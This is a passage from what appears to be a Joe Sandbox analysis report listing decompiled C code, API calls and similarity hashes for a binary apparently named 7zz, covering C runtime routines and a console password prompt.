							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x4938a4 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                                                      0x00472378
                                                                      0x0047237a
                                                                      0x0047237f
                                                                      0x0047238a
                                                                      0x0047238b
                                                                      0x00472392
                                                                      0x00472398
                                                                      0x0047239b
                                                                      0x004723a4
                                                                      0x004723e4
                                                                      0x004723e7
                                                                      0x00472410
                                                                      0x00000000
                                                                      0x00472416
                                                                      0x00472419
                                                                      0x0047241b
                                                                      0x00472420
                                                                      0x00472420
                                                                      0x0047242b
                                                                      0x00472430
                                                                      0x0047243a
                                                                      0x00472440
                                                                      0x00472445
                                                                      0x00000000
                                                                      0x00472447
                                                                      0x00472447
                                                                      0x00472454
                                                                      0x00472459
                                                                      0x0047245c
                                                                      0x0047245e
                                                                      0x00472464
                                                                      0x00472479
                                                                      0x0047247f
                                                                      0x00000000
                                                                      0x00472481
                                                                      0x00472490
                                                                      0x00472498
                                                                      0x00000000
                                                                      0x0047249a
                                                                      0x004724a2
                                                                      0x004724a2
                                                                      0x00472498
                                                                      0x0047247f
                                                                      0x00472445
                                                                      0x004723e9
                                                                      0x004723e9
                                                                      0x004723ee
                                                                      0x004723f0
                                                                      0x004723f0
                                                                      0x00472402
                                                                      0x00472402
                                                                      0x004723a6
                                                                      0x004723a9
                                                                      0x004723ac
                                                                      0x004723bc
                                                                      0x004723d6
                                                                      0x004724aa
                                                                      0x004724aa
                                                                      0x004723dc
                                                                      0x004723de
                                                                      0x00000000
                                                                      0x004723de
                                                                      0x004723be
                                                                      0x004723be
                                                                      0x004723df
                                                                      0x004723df
                                                                      0x00000000
                                                                      0x004723df
                                                                      0x004723bc
                                                                      0x004724b2
                                                                      0x004724bd

                                                                      APIs
                                                                      • GetStringTypeW.KERNEL32(00000001,0047CD24,00000001,?,746570F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723B4
                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0047CD20,00000001,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723CE
                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00471FC7,746570F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472402
                                                                      • MultiByteToWideChar.KERNEL32(?,$bI,?,?,00000000,00000000,746570F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 0047243A
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471FC7,?), ref: 00472490
                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,00471FC7,?,?,?,?,?,?,00471FC7,?), ref: 004724A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: StringType$ByteCharMultiWide
                                                                      • String ID: $bI
                                                                      • API String ID: 3852931651-2563688255
                                                                      • Opcode ID: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                      • Instruction ID: a5c6d82e9c342f5f8861e27a946ad25536d4888bca3c47b44a025a795350f61f
                                                                      • Opcode Fuzzy Hash: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                      • Instruction Fuzzy Hash: 57419E72600259BFCF209FA4DD85EEF3FB8FB09350F10882AF919D2250D37999508B99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00470C41 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E00470C41(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x490378;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x490408) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x490378; // 0x5c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x493678; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x48e044 == 1) {
						_t16 = _t54 + 0x49037c; // 0x47cc5c
						_t56 = _t16;
						_t19 = E0046B400( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00471740( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E0046B400( &_v424) + 1 > 0x3c) {
								_t49 = E0046B400( &_v424) +  &_v424 - 0x3b;
								E00471CB0(E0046B400( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00471740( &_v164, "Runtime Error!\n\nProgram: ");
							E00471750( &_v164, _t49);
							E00471750( &_v164, "\n\n");
							_t12 = _t54 + 0x49037c; // 0x47cc5c
							E00471750( &_v164,  *_t12);
							_t17 = E00471C24( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                                                      0x00470c41
                                                                      0x00470c4a
                                                                      0x00470c4d
                                                                      0x00470c4f
                                                                      0x00470c54
                                                                      0x00470c58
                                                                      0x00470c5b
                                                                      0x00470c61
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470c61
                                                                      0x00470c66
                                                                      0x00470c69
                                                                      0x00470c6f
                                                                      0x00470c75
                                                                      0x00470c7d
                                                                      0x00470d6e
                                                                      0x00470d6e
                                                                      0x00470d79
                                                                      0x00470d8b
                                                                      0x00470c94
                                                                      0x00470c9a
                                                                      0x00470cb6
                                                                      0x00470cc4
                                                                      0x00470cca
                                                                      0x00470cd1
                                                                      0x00470cd3
                                                                      0x00470ce3
                                                                      0x00470cfe
                                                                      0x00470d06
                                                                      0x00470d0b
                                                                      0x00470d0b
                                                                      0x00470d1a
                                                                      0x00470d27
                                                                      0x00470d38
                                                                      0x00470d3d
                                                                      0x00470d4a
                                                                      0x00470d60
                                                                      0x00470d68
                                                                      0x00470c9a
                                                                      0x00470c7d
                                                                      0x00470d93

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00470CAE
                                                                      • GetStdHandle.KERNEL32(000000F4,0047CC5C,00000000,00000000,00000000,?), ref: 00470D84
                                                                      • WriteFile.KERNEL32(00000000), ref: 00470D8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: File$HandleModuleNameWrite
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 3784150691-4022980321
                                                                      • Opcode ID: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                      • Instruction ID: 26f8d94228b957b8f636da331ac734a73308fccb95c236921b77b6dd9be393b7
                                                                      • Opcode Fuzzy Hash: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                      • Instruction Fuzzy Hash: F1313932601208AFEF35EBA4CD85FDE336CEB45304F10856BF54CE6251E678A9848B5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040C609 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 61%
                                                                      			E0040C609() {
				struct _MEMORYSTATUS _v36;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v100;
				_Unknown_base(*)()* _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t27;

				_v100 = 0x40;
				_t15 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t15 == 0) {
					L7:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t17 = _v36.dwTotalVirtual;
					if(_t17 >= _v36.dwTotalPhys) {
						_t17 = _v36.dwTotalPhys;
					}
					return _t17;
				} else {
					_push( &_v100);
					if( *_t15() == 0) {
						goto L7;
					} else {
						_t19 = _v92;
						_t27 = _v56 - _v88;
						if(_t27 > 0 || _t27 >= 0 && _v60 >= _t19) {
							return _t19;
						} else {
							return _v60;
						}
					}
				}
			}













                                                                      0x0040c619
                                                                      0x0040c627
                                                                      0x0040c62f
                                                                      0x0040c657
                                                                      0x0040c65a
                                                                      0x0040c662
                                                                      0x0040c668
                                                                      0x0040c66e
                                                                      0x0040c670
                                                                      0x0040c670
                                                                      0x0040c676
                                                                      0x0040c631
                                                                      0x0040c634
                                                                      0x0040c639
                                                                      0x00000000
                                                                      0x0040c63b
                                                                      0x0040c63e
                                                                      0x0040c641
                                                                      0x0040c644
                                                                      0x0040c656
                                                                      0x0040c64d
                                                                      0x0040c651
                                                                      0x0040c651
                                                                      0x0040c644
                                                                      0x0040c639

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040C620
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040C627
                                                                      • GlobalMemoryStatus.KERNEL32 ref: 0040C662
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                      • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                      • API String ID: 2450578220-802862622
                                                                      • Opcode ID: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                      • Instruction ID: f023bf0e3df83ca1e7ee498ce2c1c416e3a88b1c0401ce8498900abd94d01139
                                                                      • Opcode Fuzzy Hash: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                      • Instruction Fuzzy Hash: 7D014B70A0020DDBDF10EBE4D989A9EB7B5FB94348F244A25E405B7294D779E840CB9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00470AD6 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00470AD6() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x493840; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = L0046BFC5(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0046C5C0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = L0046BFC5(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0046C0FF(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x493840 = 2;
					goto L18;
				}
				 *0x493840 = 1;
				goto L6;
			}















                                                                      0x00470ad8
                                                                      0x00470ae7
                                                                      0x00470ae9
                                                                      0x00470aeb
                                                                      0x00470aef
                                                                      0x00470b27
                                                                      0x00470bb1
                                                                      0x00470bff
                                                                      0x00000000
                                                                      0x00470bff
                                                                      0x00470bb3
                                                                      0x00470bb5
                                                                      0x00470bc3
                                                                      0x00470bc5
                                                                      0x00470bc7
                                                                      0x00470bd3
                                                                      0x00470bd6
                                                                      0x00470bde
                                                                      0x00470be3
                                                                      0x00470bec
                                                                      0x00470be5
                                                                      0x00470be5
                                                                      0x00470be5
                                                                      0x00470bf5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470bc9
                                                                      0x00470bc9
                                                                      0x00470bc9
                                                                      0x00470bc9
                                                                      0x00470bca
                                                                      0x00470bce
                                                                      0x00470bcf
                                                                      0x00000000
                                                                      0x00470bc9
                                                                      0x00470bbd
                                                                      0x00470bc1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470bc1
                                                                      0x00470b2d
                                                                      0x00470b2f
                                                                      0x00470b3d
                                                                      0x00470b40
                                                                      0x00470b42
                                                                      0x00470b52
                                                                      0x00470b5e
                                                                      0x00470b65
                                                                      0x00470b6b
                                                                      0x00470b6f
                                                                      0x00470b72
                                                                      0x00470b7a
                                                                      0x00470b7e
                                                                      0x00470b8f
                                                                      0x00470b95
                                                                      0x00470b9b
                                                                      0x00470b9b
                                                                      0x00470b9f
                                                                      0x00470b9f
                                                                      0x00470b7e
                                                                      0x00470ba4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470b44
                                                                      0x00470b44
                                                                      0x00470b44
                                                                      0x00470b45
                                                                      0x00470b46
                                                                      0x00470b4c
                                                                      0x00470b4d
                                                                      0x00000000
                                                                      0x00470b44
                                                                      0x00470b33
                                                                      0x00470b37
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470b37
                                                                      0x00470af3
                                                                      0x00470af7
                                                                      0x00470b0b
                                                                      0x00470b0f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00470b15
                                                                      0x00000000
                                                                      0x00470b15
                                                                      0x00470af9
                                                                      0x00000000

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470AF1
                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B05
                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B31
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B69
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B8B
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046CFE1), ref: 00470BA4
                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470BB7
                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470BF5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1823725401-0
                                                                      • Opcode ID: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
                                                                      • Instruction ID: 27e12e20c1ea4b212add3b7eab65f77fdbffab05a40932be5c7e7487a2d6895d
                                                                      • Opcode Fuzzy Hash: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
                                                                      • Instruction Fuzzy Hash: 9C3105B2406255DFE7307FF89C848BBB6DCEA4571C711453BF559C3200EA29BE8182AE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046F60A Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 102memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0046F60A() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x48e148 != 0xffffffff) {
					_t43 = HeapAlloc( *0x496580, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x48e138;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x48e138) {
							HeapFree( *0x496580, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x48e138) {
						 *_t43 = 0x48e138;
						_t25 =  *0x48e13c; // 0x48e138
						 *(_t43 + 4) = _t25;
						 *0x48e13c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x48e138 == 0) {
							 *0x48e138 = 0x48e138;
						}
						if( *0x48e13c == 0) {
							 *0x48e13c = 0x48e138;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E0046CCB0(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}









                                                                      0x0046f615
                                                                      0x0046f631
                                                                      0x0046f635
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046f617
                                                                      0x0046f617
                                                                      0x0046f63b
                                                                      0x0046f651
                                                                      0x0046f655
                                                                      0x0046f730
                                                                      0x0046f736
                                                                      0x0046f741
                                                                      0x0046f741
                                                                      0x0046f747
                                                                      0x00000000
                                                                      0x0046f747
                                                                      0x0046f66d
                                                                      0x0046f72a
                                                                      0x00000000
                                                                      0x0046f72a
                                                                      0x0046f67a
                                                                      0x0046f69a
                                                                      0x0046f69c
                                                                      0x0046f6a1
                                                                      0x0046f6a4
                                                                      0x0046f6ad
                                                                      0x0046f67c
                                                                      0x0046f683
                                                                      0x0046f685
                                                                      0x0046f685
                                                                      0x0046f691
                                                                      0x0046f693
                                                                      0x0046f693
                                                                      0x0046f691
                                                                      0x0046f6af
                                                                      0x0046f6b5
                                                                      0x0046f6bb
                                                                      0x0046f6be
                                                                      0x0046f6be
                                                                      0x0046f6c1
                                                                      0x0046f6c4
                                                                      0x0046f6c7
                                                                      0x0046f6ca
                                                                      0x0046f6d1
                                                                      0x0046f6d3
                                                                      0x0046f6dd
                                                                      0x0046f6de
                                                                      0x0046f6e0
                                                                      0x0046f6e3
                                                                      0x0046f6e6
                                                                      0x0046f6f2
                                                                      0x0046f6fa
                                                                      0x0046f703
                                                                      0x0046f70a
                                                                      0x0046f70d
                                                                      0x0046f70f
                                                                      0x0046f716
                                                                      0x0046f716
                                                                      0x00000000
                                                                      0x0046f71e

                                                                      APIs
                                                                      • HeapAlloc.KERNEL32(00000000,00002020,8H,8H,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F62B
                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F64F
                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F669
                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000,?), ref: 0046F72A
                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000,?,00000000), ref: 0046F741
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual$FreeHeap
                                                                      • String ID: 8H$8H$8H
                                                                      • API String ID: 714016831-3582048164
                                                                      • Opcode ID: 357391c0e2fa0b3f268474b48e736d84afed240d425fe2d70a8c733abae89056
                                                                      • Instruction ID: 4f5feb6fdaf296d9f8f0ee304bd314e411df0013c944c963439ce23b9991a76f
                                                                      • Opcode Fuzzy Hash: 357391c0e2fa0b3f268474b48e736d84afed240d425fe2d70a8c733abae89056
                                                                      • Instruction Fuzzy Hash: EE31C571540701ABE3308F29EC89B2AB7A0E744755F10853BE1D5977E0F778A8498B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004068A1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E004068A1(intOrPtr __ecx, void* __edx) {
				void* _t25;
				void* _t41;
				void* _t57;
				void* _t59;

				_t52 = __edx;
				E0046B890(E004735AC, _t59);
				 *(_t59 - 0x14) =  *(_t59 - 0x14) & 0x00000000;
				_t41 = __edx;
				 *((intOrPtr*)(_t59 - 0x18)) = __ecx;
				E00407CD5(__edx, "\nEnter password (will not be echoed):");
				L00407CAC(__edx);
				_t25 = GetStdHandle(0xfffffff6);
				 *(_t59 - 0xd) =  *(_t59 - 0xd) & 0x00000000;
				 *(_t59 - 0x14) =  *(_t59 - 0x14) & 0x00000000;
				_t57 = _t25;
				if(_t57 != 0xffffffff && _t57 != 0 && GetConsoleMode(_t57, _t59 - 0x14) != 0) {
					 *(_t59 - 0xd) = SetConsoleMode(_t57,  *(_t59 - 0x14) & 0x000000fb) != 0;
				}
				_push(_t59 - 0x24);
				L00407B25(0x490aa8, _t52);
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				if( *(_t59 - 0xd) != 0) {
					SetConsoleMode(_t57,  *(_t59 - 0x14));
				}
				E00407CD5(_t41, "\n");
				L00407CAC(_t41);
				E004039C0( *((intOrPtr*)(_t59 - 0x18)), _t59 - 0x24);
				E00407A18( *((intOrPtr*)(_t59 - 0x24)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return  *((intOrPtr*)(_t59 - 0x18));
			}







                                                                      0x004068a1
                                                                      0x004068a6
                                                                      0x004068ae
                                                                      0x004068b4
                                                                      0x004068b6
                                                                      0x004068c1
                                                                      0x004068c8
                                                                      0x004068cf
                                                                      0x004068d5
                                                                      0x004068d9
                                                                      0x004068e3
                                                                      0x004068e8
                                                                      0x00406908
                                                                      0x00406908
                                                                      0x00406914
